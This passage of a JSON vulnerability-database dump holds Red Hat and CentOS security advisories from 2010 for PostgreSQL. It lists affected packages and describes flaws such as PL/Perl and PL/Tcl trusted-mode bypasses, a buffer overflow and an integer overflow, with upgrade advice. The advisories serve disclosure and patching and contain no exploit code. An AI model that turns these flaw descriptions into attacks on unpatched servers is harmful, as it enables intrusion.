"RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-contrib-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-contrib", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-devel-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-server-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-server", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-docs-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-docs", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-test-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-test", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-libs-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-python-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-python", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-pl-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-pl", "operator": "lt"}], "description": "PostgreSQL is an advanced object-relational database management system\n(DBMS). PL/Perl and PL/Tcl allow users to write PostgreSQL functions in the\nPerl and Tcl languages, and are installed in trusted mode by default. In\ntrusted mode, certain operations, such as operating system level access,\nare restricted.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Perl. If the PL/Perl procedural language was\nregistered on a particular database, an authenticated database user running\na specially-crafted PL/Perl script could use this flaw to bypass intended\nPL/Perl trusted mode restrictions, allowing them to run arbitrary Perl\nscripts with the privileges of the database server. (CVE-2010-1169)\n\nRed Hat would like to thank Tim Bunce for responsibly reporting the\nCVE-2010-1169 flaw.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Tcl. If the PL/Tcl procedural language was registered\non a particular database, an authenticated database user running a\nspecially-crafted PL/Tcl script could use this flaw to bypass intended\nPL/Tcl trusted mode restrictions, allowing them to run arbitrary Tcl\nscripts with the privileges of the database server. (CVE-2010-1170)\n\nA buffer overflow flaw was found in the way PostgreSQL retrieved a\nsubstring from the bit string for BIT() and BIT VARYING() SQL data types.\nAn authenticated database user running a specially-crafted SQL query could\nuse this flaw to cause a temporary denial of service (postgres daemon\ncrash) or, potentially, execute arbitrary code with the privileges of the\ndatabase server. (CVE-2010-0442)\n\nAn integer overflow flaw was found in the way PostgreSQL used to calculate\nthe size of the hash table for joined relations. An authenticated database\nuser could create a specially-crafted SQL query which could cause a\ntemporary denial of service (postgres daemon crash) or, potentially,\nexecute arbitrary code with the privileges of the database server.\n(CVE-2010-0733)\n\nPostgreSQL improperly protected session-local state during the execution of\nan index function by a database superuser during the database maintenance\noperations. An authenticated database user could use this flaw to elevate\ntheir privileges via specially-crafted index functions. (CVE-2009-4136)\n\nThese packages upgrade PostgreSQL to version 8.1.21. Refer to the\nPostgreSQL Release Notes for a list of changes:\n\nhttp://www.postgresql.org/docs/8.1/static/release.html\n\nAll PostgreSQL users are advised to upgrade to these updated packages,\nwhich correct these issues. If the postgresql service is running, it will\nbe automatically restarted after installing this update.\n", "reporter": "RedHat", "published": "2010-05-19T04:00:00", "type": "redhat", "title": "(RHSA-2010:0429) Moderate: postgresql security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-4136", "CVE-2010-0442", "CVE-2010-0733", "CVE-2010-1169", "CVE-2010-1170", "CVE-2010-1975"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:16:35", "id": "RHSA-2010:0429", "href": "https://access.redhat.com/errata/RHSA-2010:0429", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:19:52", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql", "packageFilename": "postgresql-7.4.29-1.el4_8.1.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-docs", "packageFilename": "postgresql-docs-7.4.29-1.el4_8.1.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-pl", "packageFilename": "postgresql-pl-7.4.29-1.el4_8.1.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-libs", "packageFilename": "postgresql-libs-7.4.29-1.el4_8.1.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-test", "packageFilename": "postgresql-test-7.4.29-1.el4_8.1.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-jdbc", "packageFilename": "postgresql-jdbc-7.4.29-1.el4_8.1.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-tcl", "packageFilename": "postgresql-tcl-7.4.29-1.el4_8.1.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-python", "packageFilename": "postgresql-python-7.4.29-1.el4_8.1.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-devel", "packageFilename": "postgresql-devel-7.4.29-1.el4_8.1.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-contrib", "packageFilename": "postgresql-contrib-7.4.29-1.el4_8.1.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-server", "packageFilename": "postgresql-server-7.4.29-1.el4_8.1.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql", "packageFilename": "postgresql-7.4.29-1.el4_8.1.src.rpm", "arch": "src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-tcl", "packageFilename": "postgresql-tcl-7.4.29-1.el4_8.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-jdbc", "packageFilename": "postgresql-jdbc-7.4.29-1.el4_8.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-python", "packageFilename": "postgresql-python-7.4.29-1.el4_8.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-pl", "packageFilename": "postgresql-pl-7.4.29-1.el4_8.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-contrib", "packageFilename": "postgresql-contrib-7.4.29-1.el4_8.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-test", "packageFilename": "postgresql-test-7.4.29-1.el4_8.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-devel", "packageFilename": "postgresql-devel-7.4.29-1.el4_8.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql", "packageFilename": "postgresql-7.4.29-1.el4_8.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-docs", "packageFilename": "postgresql-docs-7.4.29-1.el4_8.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-libs", "packageFilename": "postgresql-libs-7.4.29-1.el4_8.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-server", "packageFilename": "postgresql-server-7.4.29-1.el4_8.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-devel", "packageFilename": "postgresql-devel-7.4.29-1.el4_8.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-python", "packageFilename": "postgresql-python-7.4.29-1.el4_8.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql", "packageFilename": "postgresql-7.4.29-1.el4_8.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-server", "packageFilename": "postgresql-server-7.4.29-1.el4_8.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-jdbc", "packageFilename": "postgresql-jdbc-7.4.29-1.el4_8.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-libs", "packageFilename": "postgresql-libs-7.4.29-1.el4_8.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-pl", "packageFilename": "postgresql-pl-7.4.29-1.el4_8.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-docs", "packageFilename": "postgresql-docs-7.4.29-1.el4_8.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-tcl", "packageFilename": "postgresql-tcl-7.4.29-1.el4_8.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-contrib", "packageFilename": "postgresql-contrib-7.4.29-1.el4_8.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-test", "packageFilename": "postgresql-test-7.4.29-1.el4_8.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-test", "packageFilename": "postgresql-test-7.4.29-1.el4_8.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-libs", "packageFilename": "postgresql-libs-7.4.29-1.el4_8.1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-tcl", "packageFilename": "postgresql-tcl-7.4.29-1.el4_8.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-python", "packageFilename": "postgresql-python-7.4.29-1.el4_8.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-server", "packageFilename": "postgresql-server-7.4.29-1.el4_8.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql", "packageFilename": "postgresql-7.4.29-1.el4_8.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-docs", "packageFilename": "postgresql-docs-7.4.29-1.el4_8.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-jdbc", "packageFilename": "postgresql-jdbc-7.4.29-1.el4_8.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-libs", "packageFilename": "postgresql-libs-7.4.29-1.el4_8.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-devel", "packageFilename": "postgresql-devel-7.4.29-1.el4_8.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-contrib", "packageFilename": "postgresql-contrib-7.4.29-1.el4_8.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-pl", "packageFilename": "postgresql-pl-7.4.29-1.el4_8.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-tcl", "packageFilename": "postgresql-tcl-7.4.29-1.el4_8.1.s390.rpm", "arch": "s390", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-contrib", "packageFilename": "postgresql-contrib-7.4.29-1.el4_8.1.s390.rpm", "arch": "s390", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-server", "packageFilename": "postgresql-server-7.4.29-1.el4_8.1.s390.rpm", "arch": "s390", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql", "packageFilename": "postgresql-7.4.29-1.el4_8.1.s390.rpm", "arch": "s390", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-test", "packageFilename": "postgresql-test-7.4.29-1.el4_8.1.s390.rpm", "arch": "s390", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-docs", "packageFilename": "postgresql-docs-7.4.29-1.el4_8.1.s390.rpm", "arch": "s390", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-libs", "packageFilename": "postgresql-libs-7.4.29-1.el4_8.1.s390.rpm", "arch": "s390", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-pl", "packageFilename": "postgresql-pl-7.4.29-1.el4_8.1.s390.rpm", "arch": "s390", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-devel", "packageFilename": "postgresql-devel-7.4.29-1.el4_8.1.s390.rpm", "arch": "s390", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-python", "packageFilename": "postgresql-python-7.4.29-1.el4_8.1.s390.rpm", "arch": "s390", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-jdbc", "packageFilename": "postgresql-jdbc-7.4.29-1.el4_8.1.s390.rpm", "arch": "s390", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-pl", "packageFilename": "postgresql-pl-7.4.29-1.el4_8.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-devel", "packageFilename": "postgresql-devel-7.4.29-1.el4_8.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-docs", "packageFilename": "postgresql-docs-7.4.29-1.el4_8.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-python", "packageFilename": "postgresql-python-7.4.29-1.el4_8.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-libs", "packageFilename": "postgresql-libs-7.4.29-1.el4_8.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-tcl", "packageFilename": "postgresql-tcl-7.4.29-1.el4_8.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-server", "packageFilename": "postgresql-server-7.4.29-1.el4_8.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-jdbc", "packageFilename": "postgresql-jdbc-7.4.29-1.el4_8.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql", "packageFilename": "postgresql-7.4.29-1.el4_8.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-contrib", "packageFilename": "postgresql-contrib-7.4.29-1.el4_8.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "packageName": "postgresql-test", "packageFilename": "postgresql-test-7.4.29-1.el4_8.1.s390x.rpm", "arch": "s390x", "operator": "lt"}], "description": "PostgreSQL is an advanced object-relational database management system\n(DBMS). PL/Perl and PL/Tcl allow users to write PostgreSQL functions in the\nPerl and Tcl languages, and are installed in trusted mode by default. In\ntrusted mode, certain operations, such as operating system level access,\nare restricted.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Perl. If the PL/Perl procedural language was\nregistered on a particular database, an authenticated database user running\na specially-crafted PL/Perl script could use this flaw to bypass intended\nPL/Perl trusted mode restrictions, allowing them to run arbitrary Perl\nscripts with the privileges of the database server. (CVE-2010-1169)\n\nRed Hat would like to thank Tim Bunce for responsibly reporting the\nCVE-2010-1169 flaw.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Tcl. If the PL/Tcl procedural language was registered\non a particular database, an authenticated database user running a\nspecially-crafted PL/Tcl script could use this flaw to bypass intended\nPL/Tcl trusted mode restrictions, allowing them to run arbitrary Tcl\nscripts with the privileges of the database server. (CVE-2010-1170)\n\nA buffer overflow flaw was found in the way PostgreSQL retrieved a\nsubstring from the bit string for BIT() and BIT VARYING() SQL data types.\nAn authenticated database user running a specially-crafted SQL query could\nuse this flaw to cause a temporary denial of service (postgres daemon\ncrash) or, potentially, execute arbitrary code with the privileges of the\ndatabase server. (CVE-2010-0442)\n\nAn integer overflow flaw was found in the way PostgreSQL used to calculate\nthe size of the hash table for joined relations. An authenticated database\nuser could create a specially-crafted SQL query which could cause a\ntemporary denial of service (postgres daemon crash) or, potentially,\nexecute arbitrary code with the privileges of the database server.\n(CVE-2010-0733)\n\nPostgreSQL improperly protected session-local state during the execution of\nan index function by a database superuser during the database maintenance\noperations. An authenticated database user could use this flaw to elevate\ntheir privileges via specially-crafted index functions. (CVE-2009-4136)\n\nThese packages upgrade PostgreSQL to version 7.4.29. Refer to the\nPostgreSQL Release Notes for a list of changes:\n\nhttp://www.postgresql.org/docs/7.4/static/release.html\n\nAll PostgreSQL users are advised to upgrade to these updated packages,\nwhich correct these issues. If the postgresql service is running, it will\nbe automatically restarted after installing this update.\n", "reporter": "RedHat", "published": "2010-05-19T04:00:00", "type": "redhat", "title": "(RHSA-2010:0428) Moderate: postgresql security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-4136", "CVE-2010-0442", "CVE-2010-0733", "CVE-2010-1169", "CVE-2010-1170", "CVE-2010-1975"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T11:51:43", "id": "RHSA-2010:0428", "href": "https://access.redhat.com/errata/RHSA-2010:0428", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-12T14:45:48", "references": ["http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B", "https://rhn.redhat.com/errata/RHSA-2010-0427.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-tcl-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-tcl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-python-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-python", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-pl-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-pl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-docs-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-docs", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-test-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-test", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-test-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-test", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-7.3.21-3.i386.rpm", "packageName": "rh-postgresql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-python-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-python", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-libs-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-libs", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-libs-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-libs", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-pl-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-pl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-jdbc-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-jdbc", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-server-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-server", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-7.3.21-3.src.rpm", "packageName": "rh-postgresql", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-7.3.21-3.src.rpm", "packageName": "rh-postgresql", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-libs-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-libs", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-contrib-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-contrib", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-docs-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-docs", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-devel-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-jdbc-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-jdbc", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-contrib-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-contrib", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-devel-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-server-7.3.21-3.i386.rpm", "packageName": "rh-postgresql-server", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "7.3.21-3", "packageFilename": "rh-postgresql-tcl-7.3.21-3.x86_64.rpm", "packageName": "rh-postgresql-tcl", "arch": "x86_64", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0427\n\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS). PL/Perl and PL/Tcl allow users to write PostgreSQL functions in the\nPerl and Tcl languages, and are installed in trusted mode by default. In\ntrusted mode, certain operations, such as operating system level access,\nare restricted.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Perl. If the PL/Perl procedural language was\nregistered on a particular database, an authenticated database user running\na specially-crafted PL/Perl script could use this flaw to bypass intended\nPL/Perl trusted mode restrictions, allowing them to run arbitrary Perl\nscripts with the privileges of the database server. (CVE-2010-1169)\n\nRed Hat would like to thank Tim Bunce for responsibly reporting the\nCVE-2010-1169 flaw.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Tcl. If the PL/Tcl procedural language was registered\non a particular database, an authenticated database user running a\nspecially-crafted PL/Tcl script could use this flaw to bypass intended\nPL/Tcl trusted mode restrictions, allowing them to run arbitrary Tcl\nscripts with the privileges of the database server. (CVE-2010-1170)\n\nA buffer 